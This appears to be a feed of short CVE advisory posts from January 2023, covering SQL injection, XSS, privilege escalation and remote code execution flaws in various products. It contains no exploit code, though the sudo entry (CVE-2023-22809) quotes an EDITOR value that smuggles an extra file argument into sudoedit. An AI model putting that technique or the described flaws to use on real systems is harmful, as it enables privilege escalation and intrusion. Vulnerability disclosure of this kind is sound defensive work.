🚨 CVE-2010-10009A vulnerability was found in frioux ptome. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is 26829bba67858ca0bd4ce49ad50e7ce653914276. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218519.🎖@cveNotify |
|
| 2023-01-19 00:29:41 |
🚨 CVE-2022-45922An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The request handler for ll.KeepAliveSession sets a valid AdminPwd cookie even when the Web Admin password was not entered. This allows access to endpoints, which require a valid AdminPwd cookie, without knowing the password.🎖@cveNotify |
|
| 2023-01-19 00:29:40 |
🚨 CVE-2022-45924An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The endpoint itemtemplate.createtemplate2 allows a low-privilege user to delete arbitrary files on the server's local filesystem.🎖@cveNotify |
|
| 2023-01-19 00:29:39 |
🚨 CVE-2022-45925An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The action xmlexport accepts the parameter requestContext. If this parameter is present, the response includes most of the HTTP headers sent to the server and some of the CGI variables like remote_adde and server_name, which is an information disclosure.🎖@cveNotify |
|
| 2023-01-19 00:29:38 |
🚨 CVE-2022-45926An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The endpoint notify.localizeEmailTemplate allows a low-privilege user to evaluate webreports.🎖@cveNotify |
|
| 2023-01-19 00:29:37 |
🚨 CVE-2022-45928A remote OScript execution issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). Multiple endpoints allow the user to pass the parameter htmlFile, which is included in the HTML output rendering pipeline of a request. Because the Content Server evaluates and executes Oscript code in HTML files, it is possible for an attacker to execute Oscript code. The Oscript scripting language allows the attacker (for example) to manipulate files on the filesystem, create new network connections, or execute OS commands.🎖@cveNotify |
|
| 2023-01-18 22:30:00 |
🚨 CVE-2022-48252The jokob-sk/Pi.Alert fork (before 22.12.20) of Pi.Alert allows Remote Code Execution via nmap_scan.php (scan parameter) OS Command Injection.🎖@cveNotify |
|
| 2023-01-18 22:29:59 |
🚨 CVE-2021-46779Insufficient input validation in SVC_ECC_PRIMITIVE system call in a compromised user application or ABL may allow an attacker to corrupt ASP (AMD Secure Processor) OS memory which may lead to potential loss of integrity and availability.🎖@cveNotify |
|
| 2023-01-18 22:29:58 |
🚨 CVE-2022-0553There is no check to see if slot 0 is being uploaded from the device to the host. When using encrypted images this means the unencrypted firmware can be retrieved easily.🎖@cveNotify |
|
| 2023-01-18 22:29:57 |
🚨 CVE-2023-21754Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-18 22:29:53 |
🚨 CVE-2023-21748Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-18 22:29:52 |
🚨 CVE-2023-21749Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-18 22:29:51 |
🚨 CVE-2023-21747Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-18 22:29:47 |
🚨 CVE-2023-22959WebChess through 0.9.0 and 1.0.0.rc2 allows SQL injection: mainmenu.php, chess.php, and opponentspassword.php (txtFirstName, txtLastName).🎖@cveNotify |
|
| 2023-01-18 22:29:46 |
🚨 CVE-2023-0040Versions of Async HTTP Client prior to 1.13.2 are vulnerable to a form of targeted request manipulation called CRLF injection. This vulnerability was the result of insufficient validation of HTTP header field values before sending them to the network. Users are vulnerable if they pass untrusted data into HTTP header field values without prior sanitisation. Common use-cases here might be to place usernames from a database into HTTP header fields. This vulnerability allows attackers to inject new HTTP header fields, or entirely new requests, into the data stream. This can cause requests to be understood very differently by the remote server than was intended. In general, this is unlikely to result in data disclosure, but it can result in a number of logical errors and other misbehaviours.🎖@cveNotify |
|
| 2023-01-18 22:29:45 |
🚨 CVE-2023-21606Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-18 22:29:41 |
🚨 CVE-2023-21609Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-18 22:29:40 |
🚨 CVE-2023-21611Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Creation of Temporary File in Directory with Incorrect Permissions vulnerability that could result in privilege escalation in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-18 22:29:39 |
🚨 CVE-2023-21612Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Creation of Temporary File in Directory with Incorrect Permissions vulnerability that could result in privilege escalation in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-18 20:30:00 |
🚨 CVE-2023-21760Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21678, CVE-2023-21765.🎖@cveNotify |
|
| 2023-01-18 20:29:59 |
🚨 CVE-2023-21759Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability.🎖@cveNotify |
|
| 2023-01-18 20:29:58 |
🚨 CVE-2022-45613Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/book. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the publisher parameter.🎖@cveNotify |
|
| 2023-01-18 20:29:57 |
🚨 CVE-2022-47966Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.🎖@cveNotify |
|
| 2023-01-18 20:29:54 |
🚨 CVE-2023-21601Adobe Dimension version 3.4.6 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-18 20:29:53 |
🚨 CVE-2015-10039A vulnerability was found in dobos domino. It has been rated as critical. Affected by this issue is some unknown functionality in the library src/Complex.Domino.Lib/Lib/EntityFactory.cs. The manipulation leads to sql injection. Upgrading to version 0.1.5524.38553 is able to address this issue. The name of the patch is 16f039073709a21a76526110d773a6cce0ce753a. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218024.🎖@cveNotify |
|
| 2023-01-18 20:29:52 |
🚨 CVE-2022-34335IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.1 could allow an authenticated user to exhaust server resources which could lead to a denial of service. IBM X-Force ID: 229705.🎖@cveNotify |
|
| 2023-01-18 20:29:48 |
🚨 CVE-2012-10004A vulnerability was found in backdrop-contrib Basic Cart. It has been classified as problematic. Affected is the function basic_cart_checkout_form_submit of the file basic_cart.cart.inc. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.x-1.1.1 is able to address this issue. The name of the patch is a10424ccd4b3b4b433cf33b73c1ad608b11890b4. It is recommended to upgrade the affected component. VDB-217950 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-18 20:29:47 |
🚨 CVE-2015-10037A vulnerability, which was classified as critical, was found in ACI_Escola. This affects an unknown part. The manipulation leads to sql injection. The name of the patch is 34eed1f7b9295d1424912f79989d8aba5de41e9f. It is recommended to apply a patch to fix this issue. The identifier VDB-217965 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-18 20:29:46 |
🚨 CVE-2022-42271NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution🎖@cveNotify |
|
| 2023-01-18 20:29:43 |
🚨 CVE-2023-21773Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-18 20:29:42 |
🚨 CVE-2022-3100A flaw was found in the openstack-barbican component. This issue allows an access policy bypass via a query string when accessing the API.🎖@cveNotify |
|
| 2023-01-18 20:29:41 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-01-18 20:29:40 |
🚨 CVE-2023-21779Visual Studio Code Remote Code Execution.🎖@cveNotify |
|
| 2023-01-18 17:29:58 |
🚨 CVE-2021-4314It is possible to manipulate the JWT token without the knowledge of the JWT secret and authenticate without valid JWT token as any user. This is happening only in the situation when zOSMF doesn’t have the APAR PH12143 applied. This issue affects: 1.16 versions to 1.19. What happens is that the services using the ZAAS client or the API ML API to query will be deceived into believing the information in the JWT token is valid when it isn’t. It’s possible to use this to persuade the southbound service that different user is authenticated.🎖@cveNotify |
|
| 2023-01-18 17:29:57 |
🚨 CVE-2022-46505An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data.🎖@cveNotify |
|
| 2023-01-18 17:29:56 |
🚨 CVE-2022-46463** DISPUTED ** An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature."🎖@cveNotify |
|
| 2023-01-18 17:29:55 |
🚨 CVE-2023-21766Windows Overlay Filter Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:51 |
🚨 CVE-2023-21682Windows Point-to-Point Protocol (PPP) Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:50 |
🚨 CVE-2023-21767Windows Overlay Filter Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:49 |
🚨 CVE-2023-21724Microsoft DWM Core Library Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:45 |
🚨 CVE-2023-21683Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21758.🎖@cveNotify |
|
| 2023-01-18 17:29:44 |
🚨 CVE-2023-21726Windows Credential Manager User Interface Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:43 |
🚨 CVE-2022-45103Dell Unisphere for PowerMax vApp, VASA Provider vApp, and Solution Enabler vApp version 9.2.3.x contain an information disclosure vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to read arbitrary files on the underlying file system.🎖@cveNotify |
|
| 2023-01-18 17:29:42 |
🚨 CVE-2022-47881Foxit PDF Reader and PDF Editor 11.2.1.53537 and earlier has an Out-of-Bounds Read vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:39 |
🚨 CVE-2023-0385The Custom 404 Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.7.1. This is due to missing or incorrect nonce validation on the custom_404_pro_admin_init function. This makes it possible for unauthenticated attackers to delete logs, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-01-18 17:29:38 |
🚨 CVE-2017-20172A vulnerability was found in ridhoq soundslike. It has been classified as critical. Affected is the function get_song_relations of the file app/api/songs.py. The manipulation leads to sql injection. The name of the patch is 90bb4fb667d9253d497b619b9adaac83bf0ce0f8. It is recommended to apply a patch to fix this issue. VDB-218490 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-18 17:29:37 |
🚨 CVE-2022-31251A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.🎖@cveNotify |
|
| 2023-01-18 17:29:36 |
🚨 CVE-2021-36783A Insufficiently Protected Credentials vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners and Project Members to read credentials, passwords and API tokens that have been stored in cleartext and exposed via API endpoints. This issue affects: SUSE Rancher Rancher versions prior to 2.6.4; Rancher versions prior to 2.5.13.🎖@cveNotify |
|
| 2023-01-18 16:30:18 |
🚨 CVE-2023-21728Windows Netlogon Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-18 16:30:16 |
🚨 CVE-2023-21733Windows Bind Filter Driver Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-18 16:30:14 |
🚨 CVE-2023-21732Microsoft ODBC Driver Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-01-18 16:30:12 |
🚨 CVE-2021-4200A Improper Privilege Management vulnerability in SUSE Rancher allows write access to the Catalog for any user when restricted-admin role is enabled. This issue affects: SUSE Rancher Rancher versions prior to 2.5.13; Rancher versions prior to 2.6.4.🎖@cveNotify |
|
| 2023-01-18 16:30:10 |
🚨 CVE-2021-36782A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Rancher versions prior to 2.6.7.🎖@cveNotify |
|
| 2023-01-18 16:30:07 |
🚨 CVE-2022-45165An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a user-controlled parameter that is used to create an SQL query. It causes this service to be prone to SQL injection.🎖@cveNotify |
|
| 2023-01-18 16:30:05 |
🚨 CVE-2022-21946A Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local users to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen seesion. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions.🎖@cveNotify |
|
| 2023-01-18 16:30:03 |
🚨 CVE-2023-21771Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-18 16:30:01 |
🚨 CVE-2022-30332In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.🎖@cveNotify |
|
| 2023-01-18 16:29:59 |
🚨 CVE-2023-21753Event Tracing for Windows Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21536.🎖@cveNotify |
|
| 2023-01-18 16:29:57 |
🚨 CVE-2021-33959Plex media server 1.21 and before is vulnerable to ddos reflection attack via plex service.🎖@cveNotify |
|
| 2023-01-18 16:29:55 |
🚨 CVE-2022-41417BlogEngine.NET v3.3.8.0 allows an attacker to create any folder with "files" prefix under ~/App_Data/.🎖@cveNotify |
|
| 2023-01-18 16:29:53 |
🚨 CVE-2023-21745Microsoft Exchange Server Spoofing Vulnerability. This CVE ID is unique from CVE-2023-21762.🎖@cveNotify |
|
| 2023-01-18 16:29:49 |
🚨 CVE-2021-4287A vulnerability, which was classified as problematic, was found in ReFirm Labs binwalk up to 2.3.2. Affected is an unknown function of the file src/binwalk/modules/extractor.py of the component Archive Extraction Handler. The manipulation leads to symlink following. It is possible to launch the attack remotely. Upgrading to version 2.3.3 is able to address this issue. The name of the patch is fa0c0bd59b8588814756942fe4cb5452e76c1dcd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216876.🎖@cveNotify |
|
| 2023-01-18 16:29:46 |
🚨 CVE-2020-22007OS Command Injection vulnerability in OKER G955V1 v1.03.02.20161128, allows physical attackers to interrupt the boot sequence and execute arbitrary commands with root privileges.🎖@cveNotify |
|
| 2023-01-18 16:29:44 |
🚨 CVE-2021-36630DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request.🎖@cveNotify |
|
| 2023-01-18 16:29:42 |
🚨 CVE-2023-0214A cross-site scripting vulnerability in Skyhigh SWG in main releases 11.x prior to 11.2.6, 10.x prior to 10.2.17, and controlled release 12.x prior to 12.0.1 allows a remote attacker to craft SWG-specific internal requests with URL paths to any third-party website, causing arbitrary content to be injected into the response when accessed through SWG.🎖@cveNotify |
|
| 2023-01-18 14:29:42 |
🚨 CVE-2022-34399Dell Alienware m17 R5 BIOS version prior to 1.2.2 contain a buffer access vulnerability. A malicious user with admin privileges could potentially exploit this vulnerability by sending input larger than expected in order to leak certain sections of SMRAM.🎖@cveNotify |
|
| 2023-01-18 14:29:41 |
🚨 CVE-2022-34435Dell iDRAC9 version 6.00.02.00 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker could exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.🎖@cveNotify |
|
| 2023-01-18 14:29:39 |
🚨 CVE-2022-34436Dell iDRAC8 version 2.83.83.83 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker could exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.🎖@cveNotify |
|
| 2023-01-18 14:29:38 |
🚨 CVE-2022-34457Dell command configuration, version 4.8 and prior, contains improper folder permission when installed not to default path but to non-secured path which leads to privilege escalation. This is critical severity vulnerability as it allows non-admin to modify the files inside installed directory and able to make application unavailable for all users.🎖@cveNotify |
|
| 2023-01-18 14:29:37 |
🚨 CVE-2023-0214A cross-site scripting vulnerability in Skyhigh SWG in main releases 11.x prior to 11.2.6, 10.x prior to 10.2.17, and controlled release 12.x prior to 12.0.1 allows a remote attacker to craft SWG-specific internal requests with URL paths to any third-party website, causing arbitrary content to be injected into the response when accessed through SWG.🎖@cveNotify |
|
| 2023-01-18 12:29:52 |
🚨 CVE-2015-10068A vulnerability classified as critical was found in danynab movify-j. This vulnerability affects the function getByMovieId of the file app/business/impl/ReviewServiceImpl.java. The manipulation of the argument movieId/username leads to sql injection. The name of the patch is c3085e01936a4d7eff1eda3093f25d56cc4d2ec5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218476.🎖@cveNotify |
|
| 2023-01-18 12:29:48 |
🚨 CVE-2020-36653A vulnerability was found in GENI Portal. It has been rated as problematic. Affected by this issue is some unknown functionality of the file portal/www/portal/error-text.php. The manipulation of the argument error leads to cross site scripting. The attack may be launched remotely. The name of the patch is c2356cc41260551073bfaa3a94d1ab074f554938. It is recommended to apply a patch to fix this issue. VDB-218474 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-18 12:29:47 |
🚨 CVE-2020-36654A vulnerability classified as problematic has been found in GENI Portal. This affects the function no_invocation_id_error of the file portal/www/portal/sliceresource.php. The manipulation of the argument invocation_id/invocation_user leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 39a96fb4b822bd3497442a96135de498d4a81337. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218475.🎖@cveNotify |
|
| 2023-01-18 12:29:46 |
🚨 CVE-2022-34442Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a contain a Hard-coded Cryptographic Key vulnerability. An attacker with the knowledge of the hard-coded sensitive information, could potentially exploit this vulnerability to login to the system to gain LDAP user privileges.🎖@cveNotify |
|
| 2023-01-18 12:29:45 |
🚨 CVE-2022-34462Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a Hard-coded Password Vulnerability. An attacker, with the knowledge of the hard-coded credentials, could potentially exploit this vulnerability to login to the system to gain admin privileges.🎖@cveNotify |
|
| 2023-01-18 12:29:44 |
🚨 CVE-2010-10007** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in lierdakil click-reminder. It has been rated as critical. This issue affects the function db_query of the file src/backend/include/BaseAction.php. The manipulation leads to sql injection. The name of the patch is 41213b660e8eb01b22c8074f06208f59a73ca8dc. It is recommended to apply a patch to fix this issue. The identifier VDB-218465 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-18 12:29:40 |
🚨 CVE-2022-32490Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.🎖@cveNotify |
|
| 2023-01-18 12:29:39 |
🚨 CVE-2022-34393Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.🎖@cveNotify |
|
| 2023-01-18 12:29:38 |
🚨 CVE-2022-34401Dell BIOS contains a stack based buffer overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to send larger than expected input to a parameter in order to gain arbitrary code execution in SMRAM.🎖@cveNotify |
|
| 2023-01-18 12:29:37 |
🚨 CVE-2022-34456Dell EMC Metro node, Version(s) prior to 7.1, contain a Code Injection Vulnerability. An authenticated nonprivileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application.🎖@cveNotify |
|
| 2023-01-18 12:29:36 |
🚨 CVE-2022-34460Prior Dell BIOS versions contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.🎖@cveNotify |
|
| 2023-01-18 06:29:57 |
🚨 CVE-2023-21675Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-18 06:29:56 |
🚨 CVE-2023-21563BitLocker Security Feature Bypass Vulnerability.🎖@cveNotify |
|
| 2023-01-18 06:29:55 |
🚨 CVE-2023-21676Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-01-18 06:29:54 |
🚨 CVE-2023-21677Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21683, CVE-2023-21758.🎖@cveNotify |
|
| 2023-01-18 06:29:50 |
🚨 CVE-2023-21679Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21546, CVE-2023-21555, CVE-2023-21556.🎖@cveNotify |
|
| 2023-01-18 06:29:49 |
🚨 CVE-2015-10067A vulnerability was found in oznetmaster SSharpSmartThreadPool. It has been classified as problematic. This affects an unknown part of the file SSharpSmartThreadPool/SmartThreadPool.cs. The manipulation leads to race condition within a thread. The name of the patch is 0e58073c831093aad75e077962e9fb55cad0dc5f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218463.🎖@cveNotify |
|
| 2023-01-18 06:29:48 |
🚨 CVE-2022-43483Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 does not properly validate the input module name to the monitor services of the software. This could allow a remote attacker to access sensitive functions of the application and execute arbitrary system commands.🎖@cveNotify |
|
| 2023-01-18 06:29:44 |
🚨 CVE-2022-45127Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site request forgery in its backup services. An attacker could take advantage of this vulnerability to execute arbitrary backup operations and cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-01-18 06:29:43 |
🚨 CVE-2022-46733Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site scripting in its backup services. An attacker could take advantage of this vulnerability to execute arbitrary commands.🎖@cveNotify |
|
| 2023-01-18 06:29:42 |
🚨 CVE-2022-47911Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 does not properly validate the input module name to the backup services of the software. This could allow a remote attacker to access sensitive functions of the application and execute arbitrary system commands.🎖@cveNotify |
|
| 2023-01-18 06:29:38 |
🚨 CVE-2022-47917Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to improper input validation of user input to several modules and services of the software. This could allow an attacker to delete arbitrary files and cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-01-18 06:29:37 |
🚨 CVE-2018-25077A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/spintax.js. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.🎖@cveNotify |
|
| 2023-01-18 06:29:36 |
🚨 CVE-2022-43455Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to improper input validation of user input to the service_start, service_stop, and service_restart modules of the software. This could allow an attacker to start, stop, or restart arbitrary services running on the server.🎖@cveNotify |
|
| 2023-01-18 02:29:58 |
🚨 CVE-2023-21835Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 11.0.17, 17.0.5, 19.0.1; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via DTLS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-01-18 02:29:57 |
🚨 CVE-2022-46660An unauthorized user could alter or write files with full control over the path and content of the file.🎖@cveNotify |
|
| 2023-01-18 02:29:56 |
🚨 CVE-2023-21847Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Download). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Web Applications Desktop Integrator, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Web Applications Desktop Integrator accessible data as well as unauthorized read access to a subset of Oracle Web Applications Desktop Integrator accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:55 |
🚨 CVE-2023-21829Vulnerability in the Oracle Database RDBMS Security component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Oracle Database RDBMS Security. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Database RDBMS Security accessible data as well as unauthorized read access to a subset of Oracle Database RDBMS Security accessible data. CVSS 3.1 Base Score 6.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:51 |
🚨 CVE-2023-21864Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-18 02:29:50 |
